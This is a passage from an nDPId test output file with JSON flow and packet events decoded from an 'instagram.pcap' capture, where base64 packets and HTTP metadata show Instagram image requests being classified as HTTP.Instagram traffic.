2ubUAx1KxalPDxCZcJOVc\/mRFMjjylf886\/qgnF5\/zNdIB+osc8LQ7+njijbpW6+nsd1r20QxY5h4iboPc5bOwlwaY54bOkKhUi3rW\/yK+SdRmOIbvY6QnNs\/NHnLztmSVepcsVQj4\/LAs3sQee2yV5Zb\/OKdnbNcoVz0fzHzanGF+shxmnBL7MHCUWI6dyfgrtdeHJw7AeiUY3i\/mTZNsE8HDXYtj4PZmBRSpw9Tn6yrOi8oCWZlu5KzIRGzRJtFphUHZ6meh5JLg+hn5njKZANgsGVL5D4VIgoF1kaCOaYkGXgkZUN4f977LcfvI6GMq+I5puCewiP+Uuk1kPF9pzskRav04M10TqsDM7GhlmoPVQK4OBUJ9tHagFf6IatPi0\/17iyM\/LjiFML0PoAxBFfvl5DWDm64B7S6wNuZznilyLl+dRCTX+DG4IWEZ9iWMuJz0q4h3NgjCjbVoEhcXrIzm79zTgYF1K\/Fc1eVQ5pDkZIk+MSfw+JmzqDNkO7KlRRDcuvw+93T8NghPFPmCMaGi36H+eJ8qZHgJQD6VyTq0u+kS7b7xcTR0rfQCJsFB5GAwMG7Gp3gleQk40HnR7gOPSTpCQbfSRM+5donNBgSWHGZa9A+e6lLq4NFCERiwzj3U\/o3rAI1FPY3nDbj4wb3EgILuovLCxScYhTNarC2IzSTHU8Qk8N2SV+q0qGc9KDK7Jyj+IHlvAecHsLgYXphxLiTsup\/3eR29a5fD0B54hNbSHf+QHisCGvO8syBPnMdbwGhHIhnTTwNn1eEHqk6X5WP24wp\/q9HBPEopbXKhKpIJHSzjJGb6QwaZFDvJ0eS8PBbauWDkSrvIOpQ+81F3KtLkj4QiFmXv6kUM6e\/ijm1X4ctGQCDMzfE6CL9kNIZ0KT10hk0pBqwVPBgsjzabFgBWuwkhXkJMqXx8tC1EU+7y29gsrs\/ybrD8eTd4mRW4AQWWxsx8SCg4RuBagiQndKzKvD7t\/D1UNx\/cjM+FPNHc3Vo6COyR4bKIxJFsFcqKxflWpQPrWlcHnstMeCf6fe7rHShYcn66kSCS9GJMM\/PUNJmbrAgWC5m7qX18BfYRtqglq81Hxihw61ZCMOoAsDBgvxxxkjs4uHIg0bxq+QIHC4jEm62Kc2GqcJIEifAbDIMGTrfg+zGbXs6fbA2wHWV\/6sG736+zvLX7Jbtdr+R3sSX9sMXEufLQEprDfFP7rjDtjD6q3s32bdz6TPKsaKweTpBUQdUPpxrBp58LHYIfh7kBM6ZZ7B\/leOdLQ4iB0qa4hkq1hvJbOmBVgxwN8J6lLAiR2zfKtjyjIgh1PIEwm0tWG3PrpvEGPUu+zdVEzsubp+CEZmpQpom3JAd8mN1yHxpyrcTLFJkY\/8guFvDtth\/joA1HCjPx5dnKVrWK+v+DF0itobPJ17srGXjTUdxq+PcFTOSkogqyTZpAghuLdzESZm4BYIuVxTMgSSAIWua\/B9nB7ubZGXJW35Hmjvh2589ysVkb287bswERaCrOs6tPVp2NtqRIS7vXD6J\/TWsp5LCRdFcfNfT70AwbYVcnpBdE0+y3eeVEDxU"}
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":440,"source":"instagram.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942507,"flow_last_seen":1436720942507,"flow_idle_time":7560000,"flow_min_l4_payload_len":1418,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1418,"flow_avg_l4_payload_len":1418,"midstream":1,"thread_ts_msec":1436720942507,"l3_proto":"ip4","src_ip":"92.122.48.138","dst_ip":"192.168.0.103","src_port":80,"dst_port":41562,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
02412{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"instagram.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1436720942507,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720942507,"pkt":"QPMIw47hABsv8H60CABFAAW+7YVAADkGAKFcejCKwKgAZwBQolpM7hj\/zhvj2IAQAkuefgAAAQEIClRk1HoAA\/vEM\/iaPUALhIFKAs5lHhGDDQh9Ri+cJ7IlO3+U+lz\/AJfyy4DxuV\/4P\/o+vmeH\/hNqoIELoODxfoOAIXO0PMXMPnHoxqeYBwGo8oxahQh6j0xfzNnmEda9CmYCeDSna\/qNrEPvGW50RvR5h7uG+kXcGOBC7BGEPlQE7Yj9VADdS1kT29D7gnk\/qeBFzA3CDCDhz3gqv7gHmWA5mGyOJepR4EJPDEPmPiCsftA0fdwDBLwVjxH\/APKX29LRhXxOnSI4Ih5PTBEwQnYqjD3MPs\/lmZehG\/8AA\/8AT9Hx6L7CfPoFCO57QQY24Pf04EGPxc98QOB6OuYRGOvzGux+sHlCW3CnI9H6gK1Ng5mdNzFbgAyRCbreGctT5jQZEPRP6hHkIS+\/zCBFmIuGjFqI5\/uEmVBMg4hgvEdvaB+4PuYjwpncLG\/tARaSCgOECnAbe4e1GCNFARmxVQDALDyR+IOzv5nsz8T3R9wgRZi+8GdC55PovxL0YHoYoPEbSjg1BB16Ln\/4Ec+hG4XhdQP\/AAj\/AMS6qDzBT7P5oVuK4jP\/AJHo+vQ7xerHEOB\/MJM94fCL+ohnTjGoAOagD3iFagB4f5QswHhzoMy9DME64+YwcJGH3EIGYuyBB\/nEZ7TiCoY8wSKYOu5S3H2g4tgD7wANpxRQzjSFNilH9hDgQM9sJvDWSNGHs+0x8CbLnF1CclwLoBlRBpI3BxPAqGmw4ykVAG2kgAoGHly28ROIeyXA2GoWBRqYf9ufUEBje0FkRrD+IQecxboE3AOv7hC5gHugOOCfdiAGoheJXCdB6Ed+p6M6LnkF\/wDE\/UhuA8wf1fzRQdReggNdvURGX6gnc9o44SIJ4hEESg55h9ABOXCdAKBoAFARRJEzn9QkfZAdHcCZJ+0IfM82YFNwK2Mw9qjfbgB0alLX9QhRGT8SvaFD494T\/MQk8fqbOERdBBwkdmvmWKJzcwHIfLgJbfaBYGFByYLxbUA8zSMwDgeEJIj+oTwQfxK2SqgEvgPeFbIcbVX7KFvlB0KE87hYZQPRwPeH6uPhbjHBiWw7nL\/pnZCDnKByYHCBX5hgfMf3hZBZhDmz8QG7Sft6CPUI8RE4GpvB6ATxO3ovP\/jgJ7wEhHscGHx\/KuIHYBmYYPQqqng7Ew+z+eE4MfX\/AIH\/AIC6cAjiPoYHoIzU95cXVxsDhHD1AhE8T+IY4OoOZmio9RCbH6gBuoGYHNqg6GxAMRoQsrcD5h\/xiG2xCYJgDAIuFMDMWQBiwOT8QxkaQi4CCaSgP+GHg7nfnqF6wY1vXxCXqouAITzC5A3GyRRmF3HmjA9oXEGuJ4Jq1PKGF\/7E95xsZ1BT9jB0SPvOduIB7RHP\/I2Kh0kBNLD6MJz\/AJxbQj\/cwB4GCtzsgKZoQlqFxuEQHvc\/HoBi7iniEcIXcEEJgK9QOtGCOFaheFFdZ+3oP5CQaM\/4fzxGF7M4WoAHGX69x7j9FCP\/AB2jTxue8EBOF7EXZxDcScHjmEuIzgiYdDA4gRRtmHoJ56mwKX8F7wmCMfSKDe0XnQmaYuEnIC1Mc2QAHUVdCAtCh95n5imGNgyjyD5nfMLuXxBSoSDA8yxX\/E2oKG5iGgBLzCfMJ8wOCHsTPCecIsrQDCihrgix+Z7lA8uF2\/cOhJ+kLZAhOzHsR5iHYfYwUTAf3AWIwicr0HmfKhO7a+IxmwhfEE4GEoYUcHmODzCekU8+jhiigMf\/AMP\/AC\/+CLkzo9Jgh9HB5hJiiiPP\/m\/QDF7gHoYUsRjU4ATF9pWVBkA54Qk7j4h1hQB0nyIzIr0gCl4cXcIPGA8E49oZ0qhZBz7QqP8AqAKhDWgfxPgD+8p7uAtmJgK+HmA8sQ2B+ggN5gCPfcBNIz9YSgzZ9hABBp2CMzM="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"instagram.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1436720942508,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720942508,"pkt":"ABsv8H60QPMIw47hCABFAAA0JelAAEAGxsfAqABnXHowiqJaAFDOG+PYTO4eiYAQH+pOOgAAAQEICgAD+8dUZNR5"}
02407{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":442,"source":"instagram.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1436720942509,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720942509,"pkt":"QPMIw47hABsv8H60CABFAAW+7YZAADkGAKBcejCKwKgAZwBQolpM7h6Jzhvj2IAQAkvuxQAAAQEIClRk1HoAA\/vEO6\/U4C+0OWUTJgAb794HkAIhArOYgdkfiI22BCGjBFAjMJ7H5gWBudggbAYMBAg88QCbuhm0hAg9wQYHeJyZzGwFB7zDuEb1CIxUMRuZfliB7np0MYgeoY4J7+qgeYPabQ\/aB4IL9PHo+vR91\/N\/x\/EBC\/8A0ezA+Z8w+PUejh1dzuvQYmm4BAIYI\/EcE+jUD4nkjsnAhNA8wx5OA5aeINz\/AAUBr\/OAOALiPDMHk39If+VARek0ggL5idUhkPX2hAQrDqABo5\/wj6blcUMHps+4h4H9wU9ldOEBaMbWJMBg7F6bLf4ECwWUHgrMEFkEjMCoIwBEzYQLC4LK3AoAyviVQjybhI9r6wlsCgB94VnhTqRmcsioR5j39iByFiDkW+p4l8DUIG3Dyi4mQAZhCyClDE8GHwYPw7gzQ7QkYBnMHUC44nvArqGLzB9YQbQj7EXX6jh\/8eYjwIFiiz8Q2EAOV\/J\/x\/NHF6LrmV6Dxcv0cqD0MXc+CC9nEbBVQOPX2ggjHHvMvqNwABPCOeMwlwkwvyoIxB0cfSIC0DB7xZrUJVmM5BC0yIAV7Yl2YC3A5ZgUA\/KF+xEAWdXLIAuYgd+YS27EPvuMQOQnQJw3GzgZ9R+JmMzlA+JlcA0TD1iDIUoajMm\/tESS4X3XHjoOZyDMKfeEmMwvwcoyHZ\/uUUCTC2rUXHInKoObP2gYKzOtS8IzHhA8F3HuZYIEo5ZHzE3qLhzoY+YAWCiPcGZwkp7ejUc+gga3G1eIfdfedlAT5gj5EE6gdzz6iFTkFQjlEicGXPeeH8X\/AB\/ED\/5XpeIz7wA8TpK\/gPv6VSjOjn1MAi\/3MI+8EfcCE7HBEANXcACPv6wUqjgLgz8RDKgfEwYWFaUo4Fqf7VxCfaXmKxR3zcPJAAMAF9qAAtEUIRw00NEmM0hCDHA7h7DEMhnudgYhPg9oeAYfNLwrg51CVPEQAWcPg7EXLL9MBJSwx9YZNq1KYagWYA+h4H0K2CvpPdEDv8GNXZrxEphqeRmaBf0jG3TP4gIo7h8Qnc7HMEPIQ9MYgoBDKJnhXF36CJa2ICTAm1lHzqHqEuYAMKeeIR3BwBhHkwuRAYAYoDD\/AOBC+IR1Pf8A9f8AA\/h\/p\/8AL9DK4jiQmCE+p9faB5idQkYTPD0B59HC\/aAQO7qV3CYV1ZgDiovRHuVyAfrBFwZNPjFwKif1AWf2J2OENoUB+iZ4gniUx+IHTH6wBkeYwWEmDrCuR+YjiR4wICxwiF5JxELRFQLQCHzHzuBEEnDGTAEqWD+ShAN5cKZpAYRsmSxHSjO2xQ6w+HMTYnzC1FonyIOIR3AYBABDff8AyDZtfEVIYiKJhQDgP8z5DwYCUEHYxPeKKGKB4hDSL3QYgR+UAOxj6StiMylB2zD5KM65g7cfcXxmA8LHvAuoZ5hg8w+6uLzB6JH6GVH6dnXp4ev\/AAP5gIT\/AOFzqcLgd\/8AjtF6GeB6BT3gEe4YP39BC4Sk49RQhRqeIehOPMAz8Inhwtq4LXEJ1aUu\/TzAstcfbxB5v9TsR6HUP3QMI4jOnKgzrELSNTN1A5H7Qk3lxdJcFQrcADz6E8y+DmEIbgGJhOH3BbcIGziEwHPJ+I+E4CPabiALnOh9A4O4qjsRRPELQDgwRZyEPYQruIeB+5TMEqcJo\/MI7Idz6oBxMrQnuUnkCBt\/UBe8Q9RQ1j1p3cA0hfMfiH3CITwf\/NQnmD0KswQ\/+f8Ah\/D9IUFjf\/oTHEIClQz2qBAYII+oVHHD6KGByZqnhBDD49B1AYAdwdz3iimo9Dc4Row\/KI5J\/uOEEGO5YEPBioY1COYTPdCMjxANjAId+EI6EA2AahcCHIIVEDqIt8j7wQrjygpv6whzUCbmYRCBYNQWyVqMbJQ="}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":465,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942530,"flow_last_seen":1436720942530,"flow_idle_time":7560000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1436720942530,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58052,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00821{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":465,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1436720942530,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":326,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":326,"pkt_l4_len":292,"thread_ts_msec":1436720942530,"pkt":"ABsv8H60QPMIw47hCABFAAE4n8hAAEAGa\/HAqABnUlUaouLEAFAvtWVoUhBMjIAYFINNAAAAAQEICgAD+8pWC84nR0VUIC9ocGhvdG9zLWFrLXhhZjEvdDUxLjI4ODUtMTUvZTM1LzExNDE3MzQ5XzE2MTA0MjQ0NTI1NTk2MzhfMTU1OTA5NjE1Ml9uLmpwZz9zZT03IEhUVFAvMS4xDQpIb3N0OiBwaG90b3MtZy5hay5pbnN0YWdyYW0uY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBJbnN0YWdyYW0gNy4xLjEgQW5kcm9pZCAoMTkvNC40LjI7IDQ4MGRwaTsgMTA4MHgxOTIwOyBzYW1zdW5nOyBHVC1JOTUwNTsgamZsdGU7IHFjb207IGl0X0lUKQ0KDQo="}
00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":465,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942530,"flow_last_seen":1436720942530,"flow_idle_time":7560000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1436720942530,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58052,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-g.ak.instagram.com","url":"photos-g.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e35\/11417349_1610424452559638_1559096152_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":466,"source":"instagram.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942580,"flow_last_seen":1436720942580,"flow_idle_time":7560000,"flow_min_l4_payload_len":255,"flow_max_l4_payload_len":255,"flow_tot_l4_payload_len":255,"flow_avg_l4_payload_len":255,"midstream":1,"thread_ts_msec":1436720942580,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58053,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00812{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":466,"source":"instagram.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1436720942580,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":321,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":321,"pkt_l4_len":287,"thread_ts_msec":1436720942580,"pkt":"ABsv8H60QPMIw47hCABFAAEzOUlAAEAG0nXAqABnUlUaouLFAFD1YMTERbSUBYAYD2PW+wAAAQEICgAD+89WC83JR0VUIC9ocGhvdG9zLWFrLXhmYTEvdDUxLjI4ODUtMTUvZTM1LzExMzc5Mjg0XzE2NTE0MTY3OTg0MDgyMTRfMTUyNTY0MTQ2Nl9uLmpwZyBIVFRQLzEuMQ0KSG9zdDogcGhvdG9zLWcuYWsuaW5zdGFncmFtLmNvbQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogSW5zdGFncmFtIDcuMS4xIEFuZHJvaWQgKDE5LzQuNC4yOyA0ODBkcGk7IDEwODB4MTkyMDsgc2Ftc3VuZzsgR1QtSTk1MDU7IGpmbHRlOyBxY29tOyBpdF9JVCkNCg0K"}
00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":466,"source":"instagram.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942580,"flow_last_seen":1436720942580,"flow_idle_time":7560000,"flow_min_l4_payload_len":255,"flow_max_l4_payload_len":255,"flow_tot_l4_payload_len":255,"flow_avg_l4_payload_len":255,"midstream":1,"thread_ts_msec":1436720942580,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58053,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-g.ak.instagram.com","url":"photos-g.ak.instagram.com\/hphotos-ak-xfa1\/t51.2885-15\/e35\/11379284_1651416798408214_1525641466_n.jpg","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}}
02389{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":467,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1436720942592,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720942592,"pkt":"QPMIw47hABsv8H60CABFAAW+MAFAADkG3jJSVRqiwKgAZwBQ4sRSEEyML7VmbIAQAggFiAAAAQEIClYL0tgAA\/vKSFRUUC8xLjEgMjAwIE9LDQpMYXN0LU1vZGlmaWVkOiBUaHUsIDA5IEp1bCAyMDE1IDIxOjI4OjQ3IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9qcGVnDQpDb250ZW50LUxlbmd0aDogMTE3NzgwDQpEYXRlOiBTdW4sIDEyIEp1bCAyMDE1IDE3OjA5OjAyIEdNVA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0xMjA5NjAwDQoNCv\/Y\/+AAEEpGSUYAAQEAAAEAAQAA\/+0AfFBob3Rvc2hvcCAzLjAAOEJJTQQEAAAAAABfHAIoAFpGQk1EMjMwMDA5NjkwMTAwMDA4NzQ5MDAwMDFlNjAwMDAwZmE3MzAwMDA2M2U0MDAwMGEyMzYwMTAwZTk2MDAxMDAxMmNjMDEwMDdkMTQwMjAwZGE1ZjAyMDAA\/9sAQwAHBwcHBwcMBwcMEQwMDBEXERERERceFxcXFxceJB4eHh4eHiQkJCQkJCQkKysrKysrMjIyMjI4ODg4ODg4ODg4\/9sAQwEJCQkODQ4ZDQ0ZOyghKDs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7\/8IAEQgEOAQ4AwEiAAIRAQMRAf\/EABwAAAEFAQEBAAAAAAAAAAAAAAQAAQIDBQYHCP\/EABoBAAMBAQEBAAAAAAAAAAAAAAABAgMEBQb\/2gAMAwEAAhADEAAAAO9N4sXTDu15V0zXWqS6eeKmgreaCCmgg7uEVJBFpoIqbJxUnCLu4QeTiZpSHB3cGdOqZ3QRk7jdJJupIE7IbunTdJ01OMhpJ0O7ON3aSOfwekxeD0uW5b1DncnTsA9NJjtugMD53fqZhIgWgSaAtbEsWQtyzLPTnJhkzlli0uis5Bw7O7irEdfDm7Q3o5VwFjvEUYqlhUYWiOMp6HN4L9xoRfHbOtZDzdIqnt5UkurlUXoRcsXKR16897uavZ1aZJAySBM7AzpAoyQRQgyWmsrLZ1OZUcAMdHNE+Pr4jXWjcf5Yn6n5BjRjQdkY2Ci0j2KtwOa\/UpM3ThJRs3xi0n0mLpwZpOEVJkou7MSd02Z3ZFpOEHkgZ06GTuOLuhNJONJONnSQ6khpJwSdxp0k3SkN0kh3Zxu7STU1Wnghs\/P2jYmxyVZaPV5dg9EEcFEMbREli20VTekwDSyB3KDNbYk3lNtwDNIYAe3by0E+sjys0+hryZgbUO7JtFhyPAtU9x0fnXT5Pe0s8iDQmLcK2RFHXhU6XTyJnQ28l6vzLNitasqL77zvTx19X0ci6zQXnPPdfP7MvnHFT+lsL59dHsm\/89emZV6Rwnnza5jdZxo6r1zovBcxn0zk+Fuz0rN88YOj54WAHVCQZESpRo6asDUEg+pcTzW\/zOv0wrwT2tqjD9I4GWD0GFZpn3V3jttz7jDCvpQgFzWGnoul5+tsu35+PE65+hGeTZlT7uR8ydJvn72\/jvpsaaqz69ctVZ2lpLKT0oqTAk8hxUkhJOCdONJONpJwUoyTdncE6dNSUk25Pb4401KwD+XrjwXoWViQow+4a5bP6vJ0nnR9YKwCs6sKb6awPu58RHXNxxs1uwH0ZoswO2Gbbm0i2IA2jMsDvRdUaULFs2KwzolWtLXv2s7q0nGSLJCq2zNhzG32cRjcZ5mHvkvmnpYZ\/G44avfLzN1IbE7nlky\/T\/MstLZrG1W\/PSfZOu5d\/ArvpDw\/t5uJCKz6NPKChFXSGiq1p59mmZDDhAbKIjC40UhbGFKqLSdOLO4MkkfQh1cJjj+O9GqqPQOf5vU87txCsYGo7vZ879onVefdz8yDmjOv7+Tz\/pFy8v0="}
02397{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":468,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1436720942592,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720942592,"pkt":"QPMIw47hABsv8H60CABFAAW+MAJAADkG3jFSVRqiwKgAZwBQ4sRSEFIWL7VmbIAQAghpXgAAAQEIClYL0tgAA\/vKkxiut5qB26Ow9Pj8+yfWMCa4DUGy+Ho3+c5jmKfpvReNdKH0EH5lbcbz+eZjXvWt849W37RLwLcqfYn89ApepLzJrn01eX8qj3x\/Byg9vl4hMftksS8eq4V9yQ9dg87nd3j8t6NPn9HZ78M8\/m15\/SI4iV0+Hr5YZdJFWiriRaANGqKgC2yBU5D1y9AGO5LwC+hZAOnTCa0b8GSfSXc3ZK6AUI8M2\/RlL0N3AaXqkYlae70WFvXE\/MysjfHhicTX059\/nyudDYrqom8O\/SwbXeAYWCl2HDbeHOmh0nFvU+hbHnPQ5vucrmudw17ngsyPVk8VHSYNOA4HAkiaZ9LkB4VlFV6oQoQoqHF7YpwjYwQuo3UsJOh\/RGPbfOPDFikaxDY4DU5OkkXmo2bPofj3YqtI3A2tMe8H5Nt8O55y1B5\/7N5\/Hj7N63x3O1z+g38A6wXb+eEc9NDyaVW6IJldX6R5B6ZmuRoJAaDtPubZt\/FrO\/ofNxI07nn+e9Kt8ed1WPUA43vniOOoe+MdtjoYlp8vJuziWF9ZSfTEwvQuT1MrucEnl3NmPfozec2Q8b4rocvm7XZ0ZulcvKtUOGRAQ4+gnWZDVgPNWhEKtHOpze6ZyDRXdX8BKT0GfAkRXbz40uX19WJqIDO0OmFTszkplJub3z+cPQ\/JvQ6z862sGNz1mVnCXPSY4Ty9OzHqpGSzpKihVIIPNmVKcRNOqLCYDILVVeEY398LgV1vOVI9RE0wT4QEQJpSDAaZU3nNoOD251yCtoLfS5daqb9QCMzcp43dzem6ufhS6Oew6aI6IVlfacgTJtbFeleWXZh0ue8o8\/FVehcsDozfPVyqd2beAaLdw7AEWuPBsy\/NtRo7nK6amwzE7wely5\/Li6bHG7EM3mel42aI9A86edPRMPG0Ly9C4IXGVdSXyWneZ42VsFYuj6kTogdbNyRn62pnUvPuruzMr3A+oweXcoviYt9jgW6815zm+k8\/tAB\/OBUuybA1gvm903GUlLnZS6ZF4KFr24FYdVfxNcHoN\/nFir0ejjdiS\/RN6WHm6VtwnvhPbN\/CPbfkffMXtuX3qjh3relJQiEoMQKEpOyKasJqDId1NjV21hXC6QDvdJEJVO1s\/Q\/zN6OTm8v3oOGonI9l57alQUrkXYpZMcsGthFgcg05VXIYrOJRhIhUfQ\/A63I8zG3eKzunHr8oC2NDAbQaOkGxtKX2WhycdMdrn93jLkKuKz3vZ9JmVLTQZa3BEZ0bqBxVlISUosM18C1LstzjfR8zjgcXvgyeor56XydIvT6GCMTACyMtUrgCKhlE19BSC9tDF2gkO5dOOJom5fPt2VnLbnJsVlaDDEPHHuS8fSny7ebZ3qPK2w9TgzU+rEx8ulpAaNFzDbyos643zk7Ou5p5O+X0FYusqEnp3Q6dbPtiuk0uU14ejc98q24cupIjGzSHlDhtF575ZOO+XSVH4SnEqKawNGGtZiJmIRtjEC5UnTQtnUn51xEfWfPtM8B7b2wbSKwHWlcGMSfEWVosImWLXNObHxqcs3YBBYOiCN6LkB4epBLK0KLAqqCHVFoZN\/S\/La3Ded0EcjPZ3z3AN\/GxrIy9iG8YgvWH1PnkuwzLWQPtqlhubqs540iAhZVVsNHpgy+LaCMldVgpipyGjRNCQdSLo8zK5\/dN6RMPzzXjRmF7eCA9vW05aci1898xYkdUwXtNbK2ik7MtyrTKySLWrnk2azz+9hky9fQzRuXXXQYOOm8sLU6Mz+T6DMig+c38yaBw+rLTxauj59VjG6rUoWWXRciQb8rJMP0s6wZdhrOeI1OpspY+oXQgyBjtBm3CyFWZNgavivsvzz15cAGTDTH0Hz\/1jzPKsrUpltBIzz0jO0ZWIpZqARY="}
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":541,"source":"instagram.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720950909,"flow_last_seen":1436720950909,"flow_idle_time":7560000,"flow_min_l4_payload_len":1398,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":1398,"flow_avg_l4_payload_len":1398,"midstream":1,"thread_ts_msec":1436720950909,"l3_proto":"ip4","src_ip":"31.13.86.52","dst_ip":"192.168.0.103","src_port":80,"dst_port":58216,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
02393{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":541,"source":"instagram.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1436720950909,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":1436720950909,"pkt":"QPMIw47hABsv8H60CABFAAWqgMlAAFYGaDQfDVY0wKgAZwBQ42ig4vcaLhm0z4AQADsFTwAAAQEIChPCQpUAA\/8J\/RR\/Qw44auNd5sy65M8X7sSNLvesqLPp\/hWIEgj7u\/c3G33+CGWHr5NjTBvseCa33d9vm54JLq\/16uWtfE8LiAl4wMLDP475fV1R18fJlgWHzmvfo5rv8qseyXDb2HUuXqKoKX0JEHYQ4SCsd7x2l6PL5eytk2f\/kmJp\/iODsxx2N\/N4UQwH1r7vqSLq\/y5DElOXzRARZUzbImejgsz5wOzVgeOngfBrQtGX6fL5DmkthCiZgx4mBvjCvzFR0YP1xM0OXv+CShnIqVrP5zMdqJDyzU483pE+34fsEdDMZT4JhGoy\/98gru4qi0lyXyEksrGabld776ByfJIVVp4RivH8YLNUqtpfCVBnMTiA7j\/sfl7slzSCJaM2S8tAkbhjEusFLl75fI1asIxOiRsWcrVhmx\/PbZlpNd4K8\/v2iJLC1YElBY1y9j56WJc0LPwne+0suiyX3kgj3Fb6y+5RCsQCy2EKLdhWRbyLYVKkL4lX1A\/hBl\/EQkdQU6AhwlzHoU9XC8zrf\/sv+pTGiGgMczA3HQL0c6iXziIlynBHwH6WDIGpFhs4sIl7R4Y0SaCPOZA1lnMfjRJoKCOWKLZc4VEiazWUhaMala+ExIJc2XmtrYy\/iRYyo+LY2ytYUtBbJwRglHwtVOPffxRf4sv1nIag0M0miGXxU6GsLdqvokImfUh+1xnyRB2wekFeanQUhm7KU2GNA\/Wut8I6